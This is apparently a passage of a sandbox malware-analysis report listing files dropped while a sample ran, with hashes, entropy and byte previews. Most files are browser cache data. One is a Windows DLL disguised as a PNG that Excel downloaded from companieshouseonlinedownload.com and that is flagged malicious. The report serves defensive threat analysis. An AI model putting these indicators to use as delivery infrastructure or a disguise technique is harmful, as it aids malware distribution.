                        SHA-256:C3520E3A6EB43F6D416852C454414C5D7823A96FB9070BC30301ADDEBB334D4D
                        SHA-512:D9E03A617D1D9505D3ADA3C41FC8A53504F4F1C44F92AF00869F2FE150D6677FD4450E85EB1E3D920D32BA01F190E7F14BF130F8CC69EB47D834CCE43CAA7650
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1786
                        Entropy (8bit):7.366016576663508
                        Encrypted:false
                        SSDEEP:48:3ntmD5QQD5XC5RqHHXmXvp++hntmD5QQD5XC5RqHHXmXvp++x:3AJ8RAXmXvcOAJ8RAXmXvcu
                        MD5:6AEB4E76C6F68EFD7A48092E9F0F3492
                        SHA1:823A035C0BDCC3DC09C881E788F7FACA53C6B458
                        SHA-256:FE1B9A0EABF44FDBE4DDE97C3CC1209FAD2FBB2D2D7476FFBF64066BD9919A4F
                        SHA-512:50D98FB4C9875B1AED0AEC06A9C934DB5010B6C5F54539E323EC14FD487E1D92D01652E4614DDF308AB2F1EDEA9E9CB1E23030C971255CC106016C6E7BBAF48C
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Dig
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.126037102673156
                        Encrypted:false
                        SSDEEP:12:bkPlE99SNxAhUegeT9kPlE99SNxAhUegeT2:bkPcUQU769kPcUQU762
                        MD5:9FE6EC7AF7A771A5465B9C429223A77B
                        SHA1:77BC291657A30BFD37EC9854E1EF180CF041E85A
                        SHA-256:59ED067380B844F51E5F08229329A3598BFA02334AAE6BB0370758C532F38EF2
                        SHA-512:898CEA71EC57FC22BE2DB2A1AB7E859F9EAB6325B2BE9573C7F73EE72D5F5C41BBCDBD22E62F0145693CC23F5688BEFB4E97CBB1A65E95FEEE67ABEC3DC58CF7
                        Malicious:false
                        Reputation:low
                        Preview: p...... ........0...~...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...p...... ........P...~...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):504
                        Entropy (8bit):3.0413682343734383
                        Encrypted:false
                        SSDEEP:6:kK6liBAIdQZV7eAYLiWK6PliBAIdQZV7eAYLit:ylidKOJlidKOe
                        MD5:0E47BE2C181ED597A3D9EAFE5D6DBBBD
                        SHA1:E23AE49D778A973D8EAF6CE4879B3B1C247DB505
                        SHA-256:F56F2A329494ED55EF6E27629EDE2FDDADD19AC98EC480F400A3DF63A7122E9F
                        SHA-512:2E76406B3A1C9046DE53E1194905208098E65BD0B90628B0E8D51DF7DAA6C35E56CDE9620510D4089E720BFB866B73775E8F5A78C8065C7426B439914B1A2CC2
                        Malicious:false
                        Reputation:low
                        Preview: p...... ....`...H...~...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...p...... ....`.......~...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                        C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:PNG image data, 16 x 16, 4-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):237
                        Entropy (8bit):6.1480026084285395
                        Encrypted:false
                        SSDEEP:6:6v/lhPIF6R/C+u1fXNg1XQ3yslRtNO+cKvAElRApGCp:6v/7b/C1fm1ZslRTvAElR47
                        MD5:9FB559A691078558E77D6848202F6541
                        SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
                        SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
                        SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview: .PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d...-PLTE......(..5..X..h...........................J4.I...IIDAT.[c`..&.(.....F....cX.(@.j.+@..K.(..2L....1.{.....c`]L9.&2.l...I..E.......IEND.B`.
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5591F91C-4571-11EB-ADCF-ECF4BBB5915B}.dat
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:dropped
                        Size (bytes):42152
                        Entropy (8bit):1.9832934336332197
                        Encrypted:false
                        SSDEEP:48:IvpGcpU0Gwp0k1G/apnkPKrGIpHkPNgGvnZpEkPNoloGoYVqpqkPNoKvGo4Es5pP:MvKMKwp19JmaDk0vR3ZRGo7536eT8PW
                        MD5:8F6C3B20FC4351C7BA4BDCD3E1A3672E
                        SHA1:958EE2FECDB61FC960C639FDB8224BC1AE20A9E3
                        SHA-256:E7C6E80294FE56986DE73B144999A7233D68EA4993CA312E7C89411CFEA26433
                        SHA-512:2221BBA9A3D8F7614CA80600E00EF7C6847085F8C88AAF95441219F753EB12050CEE2A432E29E4EFDAFFDDDDDF6CC7D02010CFE0B182E15FB45DA020AEBD1258
                        Malicious:false
                        Reputation:low
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5591F91E-4571-11EB-ADCF-ECF4BBB5915B}.dat
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:dropped
                        Size (bytes):26248
                        Entropy (8bit):1.6612659629621438
                        Encrypted:false
                        SSDEEP:48:IvjGcpU6GwpNS7G4pP+GrapgSUrGQpC2GHHpnpsTGUpHcGzYp1SlcYGopJ8ZyGAS:MZKibSdJweSUFc1ppkJIzqcYPb/q+VA
                        MD5:E06EA0253179EED5DBC53707B56F8A92
                        SHA1:E6CD968CD8285296327A6D986077757419FA6061
                        SHA-256:0B99754A6ED1E19B185295789F5C972187BE914E12307033FBFEAA09D3D2912F
                        SHA-512:886501DDA768200C7AB3BBA6449A34F0631A3DDF24B7F5CBD1482756A8D637DF4BF77F156DE1663EDBA4D451B34162B9811185A01D201AC1F5D4CCB3A14F98C4
                        Malicious:false
                        Reputation:low
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5591F920-4571-11EB-ADCF-ECF4BBB5915B}.dat
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:modified
                        Size (bytes):21592
                        Entropy (8bit):1.6170895031774963
                        Encrypted:false
                        SSDEEP:48:IvtGcpUkGwpNAG4pPQGrapgSIXrGQpCiGHHpnMsTGUpHhWGzYp1i+YGopb:MzKcbgJueSIFc5pMkJhazTYB
                        MD5:7A5C0CBBB6BBCB9565F340E31F8EE086
                        SHA1:441E82533DB58126C3E0E9FCBE68DC0829569DB8
                        SHA-256:ED9473E7AD871E68F006D814539108459787A6B48A01494593E83CC23B89DFC3
                        SHA-512:B1F36EBAA298A47527F566EED303D19F913A6D6FFBDB2E61AED0EA4C7EC0D49E8DBCF11E79DDA6F2D4B12C63A353EDDC636E6E7C3839DDC7F2402C9D472B7E27
                        Malicious:false
                        Reputation:low
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\lr5drzg\imagestore.dat
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:modified
                        Size (bytes):420
                        Entropy (8bit):3.3453148669341766
                        Encrypted:false
                        SSDEEP:12:jcMplkyw/3cAorQQQQQPR6V6V6V6V6DrFFFFC:jznw3BLkFFFFC
                        MD5:B2402A0EA964074E6E4F121C98EB9DF4
                        SHA1:94A7BC703916FB746D79C0B1E80D7659541CFB06
                        SHA-256:20D9719CE824852A228E78BB6FA61C7C9CCF1D65A0C4BCB0759BE2CF205FBDF3
                        SHA-512:D7B39D3C131D5F29F718145BEE7EFB138A5A7AA3986B857531E077A274038EBC5C4EA64D329A8DD7B728E46384FADBB6C031732F4B897FDB5A29625B158CC249
                        Malicious:false
                        Reputation:low
                        Preview: .h.t.t.p.s.:././.h.o.s.p.a.d.e.r...x.y.z./.f.a.v.i.c.o.n...i.c.o.>.................(.......(....... ................................C.......s..............................................................................................................................331.""!.331.""!.331.""!.331.""!.331.""!.331.""!..........................................................................................._......._....
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\index[1].htm
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:ASCII text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):16123
                        Entropy (8bit):5.997516323904779
                        Encrypted:false
                        SSDEEP:384:3L1HLJ6qdD5YXSxp+hJSKFzuqUOiXtj9lQSC1UwrRsBKO:71F6SDeW+1FwOyVPC1nrW8O
                        MD5:A297353D64963C970FA560C345170869
                        SHA1:2EEAC3FFB9880AF4157F5F3FD4011A916A6A2D4F
                        SHA-256:6D4A0ABE135CE49002A65447ABD03D5992B321315D16E061D303A6F38DD10B83
                        SHA-512:BF05E69DA7739B03C42D3F36676D431A74513FB29AA040B7E99A0A44F8DF195D175B6D81F31A79936ECA877B26E65D633E00E39DF8165E0346E55D572276FC4F
                        Malicious:false
                        Preview: O9V46wB7DDp4ZHcEWJ0kKzydWdUNcEoF1BpTszoM0HMV8aPdT85NsIitrYx0oBNCM1wfIkwVqViwHrcSiigv7jY8L874pYrcJ6aKr81zcIDuGRAAbKIOM3ApPpCodk+JV3DD9I32T6fCbr0AiuNoeuBTmTdrTowFRWGUeR6q3hkyZ/s5PBX00uHeFm1CAL0cR43ZqvhbBsOHLf7AjaxylVOHdLrTsaWoYyYBg2aGLbP6GjLDX9Pu8EyKxzmlS8Z0lmOzolMV1dI7e7dRgmkE/3tqfj/CkX8IICMKl3fYoP+zyDeU/inzL8k6pkk3Vi+888TOtbONbHtw3hysAgIC8vXvtFdX4DnfzYInEzj+MqTyb2ntDOhLJWfFkhK1HXnvhlL8stuR9CvmLmeDonReqdGc1TRvfx7rCfcV4oHZmXC41Ko/43+c+hnEY+8SrRfblCh8zXotaKQwoCK8NtMnp51R54KGBx4pCp1zySkiF8fE2pS3V9ia1YDXv/tfqrQeJxpR9cHxbAeGfv0v3o9AbW984EtA8sAD+r8CSLalnO60d99EhFFN3dkr4Wa4IHePnY3rV/boEGLwzS1TFudwdnJAb5qrErCjYYAUKspqqKlb5hknQWIA5zEtuoIb/8zqxkh5mUvq8pxIixdYI052gHAlu4CNFcSXdxsAyCQVGWdnwQNcNXKrbfZEsE6aVQkN6u8A2KMLWBnb/fzzEEi0PrCMY15DwpPECkoMZ9FeEcpDK2DYmWaY0uXPpQKruu8LU2VHCrAo6Q5YTcCCLI41YjRiOvkcnMQgDRNaA1souAxRIOoZpNIPUHSiMk+7NwhnAi9KCBuIBMbdX6TDi7KYAuSi5FkZaXekj8GcmXi8T1DdQ6BujK8/+H8+6a3C90UUpNfSwkW+lXlc+daZqiKWaSJyE+8gg4zScfjr78xQHr/FNUI8VlnSWI6BDrASpg1Jo0vrL+TmomRPL6JCdRSkurfrgOEKS9kFGv49tIrY
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:downloaded
                        Size (bytes):238592
                        Entropy (8bit):6.175489362185205
                        Encrypted:false
                        SSDEEP:6144:bzLqexzY3mXAJ3WhC6aBpF7lZUPp0lts1BPz+A/OKwVdJ:bzLqmzDAEhCpTdS0Ls/UndJ
                        MD5:68CF96F4BC91628E22E1526D9728990B
                        SHA1:A1E1063EC8C3667E86E1AFAB81CB6BBEA84485B3
                        SHA-256:790191B70550856B3E8EC108FDB82CD8D852822D6716EC865F21CFB5AD160B7C
                        SHA-512:CA6BB734DF8BF35A2F3346FF5AD954ECC058A719B0EABF90D8C323B80ED6B8659CEF5B5F51F65B149C48435BC396920549A72471B0CDE1D70A02BF59DBF37B24
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 8%
                        IE Cache URL:http://companieshouseonlinedownload.com/ox9.png
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D...%...%...%..:...%..n9...%..:...%...]X..%......%...%..%...]O..%...]Y..%...w_..%...]Z..%..Rich.%..........................PE..L...YL.[...........!......... ..........................................................................................K...d...d.......`.......................H.......................................................X............................text...$........................... ..`.rdata..[...........................@..@.data...............................@....rsrc...`...........................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\favicon[1].ico
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:MS Windows icon resource - 1 icon, 16x16, 16 colors, 4 bits/pixel
                        Category:downloaded
                        Size (bytes):318
                        Entropy (8bit):2.9762388849626085
                        Encrypted:false
                        SSDEEP:6:8zE/3cAoVNONONONONONuIIIIKNX6V6V6V6V6DrFFFFR:8w/3cAorQQQQQPR6V6V6V6V6DrFFFFR
                        MD5:A976D227E5D1DCF62F5F7E623211DD1B
                        SHA1:A2A9DC1ABDD3D888484678663928CB024C359EE6
                        SHA-256:66332859BD8E3441A019E073A318B62A47014BA244121301034B510DC7532271
                        SHA-512:6754D545F2CE095CFA1FA7CA9E3223F89E37726EE7E541EBCF3E209E18B2602F3BE8677598CB30D697327A63DE032C11DBF8EF7AD7889A79C488A21044C1CB3F
                        Malicious:false
                        IE Cache URL:https://hospader.xyz/favicon.ico
                        Preview: ..............(.......(....... ................................C.......s..............................................................................................................................331.""!.331.""!.331.""!.331.""!.331.""!.331.""!........................................................................
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:ASCII text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):1376
                        Entropy (8bit):5.556217650885369
                        Encrypted:false
                        SSDEEP:24:SYgwxCzXbuSGe42+uFyL7QrX7rWKuhKViE93WILu4bKWH5eoR/PlBiW:wiCXuSGe43uFX7r5uh893za4bzeo1TiW
                        MD5:6BD04187F24F82F5AE33F86F4D97BDC7
                        SHA1:445C2C59054293E1BF30CFA9953FF9DEC5EEC24D
                        SHA-256:55E11BA82FEE0CC7A9910975340376E9A787BA086E90637D1231C0E34D24087B
                        SHA-512:2224A5BAF6BC18D4929F7928878C8348160AC6ABF533EF7B92F980A726BB0C4A5E3675163661337087A0FFC4597D287B4B0525388FEDADFCA1E113CBB47D3A9C
                        Malicious:false
                        Preview: OTkzNDQzMDdKTWJyUXlSR3ZYWkhDZEc5bHBPczNWRkY2YnpFaWFha3hrSHpXZkNVV0VreGVrQTBDdUIyMGwwMHV6NXl6WHZ1MTI1MzZDczlCRmFIWUhyejUzQmU1YnMwTmpMckhTRnJ0Sk5LYXBhSVUwc2ZiWnVIMXRCSnVSMEsxRm14UFZxbnNsOGwyTzFaYmFldUlxWmtBczFFMm1kaU83RVpYUFA2aWJTVWJyU3JwTVI4QnpzaDVPaGhDS0J1TUx0QlJldmtENDJTOHhYMEpNV0xZZkZHUVIxVmNuVXhpWjJ4dngwNXNtVnNNN2VxQUVDYUl5Rk9LbVBUaDJjTXQ1VmRPaG1pY2FZc3pHV3duVmN5dWxHY3JQWjhTM0t5MUs5R1RzTVljelRsQ2x0WUN5MVYzMlNrQWZuOGt0cGlBS05tYjE4Y1ZxUkMzVmtFejZQbE4zMHhacnhuOWVZWUJuUWNiZDVHeDJHVU1qN3d3YmJGNjJaak1JZ1JTZnlGdEVMVklHV0J4bHdUT0RLN3JiNGljdGR3dUdQUDZXWHBHb0FOT0xiRjBMc3MxNU1CYUtpekVPYXRZS0Z0V2lnU2x3Y00yVWZTQXlxVExlQ2NNZmx5a3pPMU96Ykx1Z3dmbVpER0kyWWhNS1h3bzczR2J3UzlJclFocTh3dzhqeVBENnc0WGxnelNFaWRNQVlMVHN4dHA4UGFGR1N3NGpMVFBZVzZCR3RiWHdGUnBUM0oyeDBoeDZTN1ZaalVzMEdKNDFkeldnbzRyZ3BXTFFFc1VENEw4NGFJVmoyZUl4TDlEc2cxZnBYMHAycHRMbXd3WXBYMng0bHc5eGRuZkNtc1o5RktQNFZMUEd5RTRuVkg0V0xjVW1ETjhHdzNuNlpueE04ZTFacVNMT0hVNXlWMWlZeXR6UDFnWDE4amhDTlM0WUJxdXl6RHlHRHB1c2Naa0xUVFk1VUhIQ3V3YjI2bUJDMlBQb3h4Nk03UWx2
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\favicon[1].ico
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:PNG image data, 16 x 16, 4-bit colormap, non-interlaced
                        Category:downloaded
                        Size (bytes):237
                        Entropy (8bit):6.1480026084285395
                        Encrypted:false
                        SSDEEP:6:6v/lhPIF6R/C+u1fXNg1XQ3yslRtNO+cKvAElRApGCp:6v/7b/C1fm1ZslRTvAElR47
                        MD5:9FB559A691078558E77D6848202F6541
                        SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
                        SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
                        SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
                        Malicious:false
                        IE Cache URL:http://www.bing.com/favicon.ico
                        Preview: .PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d...-PLTE......(..5..X..h...........................J4.I...IIDAT.[c`..&.(.....F....cX.(@.j.+@..K.(..2L....1.{.....c`]L9.&2.l...I..E.......IEND.B`.
                        C:\Users\user\AppData\Local\Temp\0CDE0000
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):307860
                        Entropy (8bit):7.98827510309618
                        Encrypted:false
                        SSDEEP:6144:tn9nZrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+M9mR:t9nZFPM8R3AsB+bjej/9cV
                        MD5:E682C5BD11DE1F36003FEEF9DB78649D
                        SHA1:220B7A29D4F9776ED855D5E7B76CE534FB0E4660
                        SHA-256:1B7684539C4981A8D646949512CC3363B20B8A478F89AA2AE7A6307D613F6F90
                        SHA-512:3FCF6FB39B21598FF3D505986F27DA752B80E051A81E3051AEF6C4C5F9C5B64D0D1E4A6ED0BEE6AA25D6277768DB15C5A17B589705481AB9C7AFF2A05E5B10A8
                        Malicious:false
                        Preview: .U[O.0.~.....uJ\x@.j..c.......ib.7.....c7d[U........r>.....3...m.Y3c.Z.]...~..Y..X..Yl..#.Z|.2..z...mlY....<.....y.4.r.@...q.b.......g..T........'......,.e...,.2.^+....g+.Dj.Z)..'C.M..A..1....H1.cJTXd......2.s.?.....d..CC.RJ..(.7....9..[Z..$Vw../0...h...z..9N..4..@...."...K.4..:<.T.....;$..I.._...O.(..#....f..3....hk(..?..h.!/..'_h&..i.1.....r...}........>d..l.....} .....uO;..........#5...7...2..D.!)....2*R[......x.(.h.r.-~.......PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\Cab1CE2.tmp
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                        Category:dropped
                        Size (bytes):58936
                        Entropy (8bit):7.994797855729196
                        Encrypted:true
                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                        MD5:E4F1E21910443409E81E5B55DC8DE774
                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                        Malicious:false
                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                        C:\Users\user\AppData\Local\Temp\Cab1D23.tmp
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                        Category:dropped
                        Size (bytes):58936
                        Entropy (8bit):7.994797855729196
                        Encrypted:true
                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                        MD5:E4F1E21910443409E81E5B55DC8DE774
                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                        Malicious:false
                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                        C:\Users\user\AppData\Local\Temp\Tar1CE3.tmp
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):152533
                        Entropy (8bit):6.31602258454967
                        Encrypted:false
                        SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                        MD5:D0682A3C344DFC62FB18D5A539F81F61
                        SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                        SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                        SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                        Malicious:false
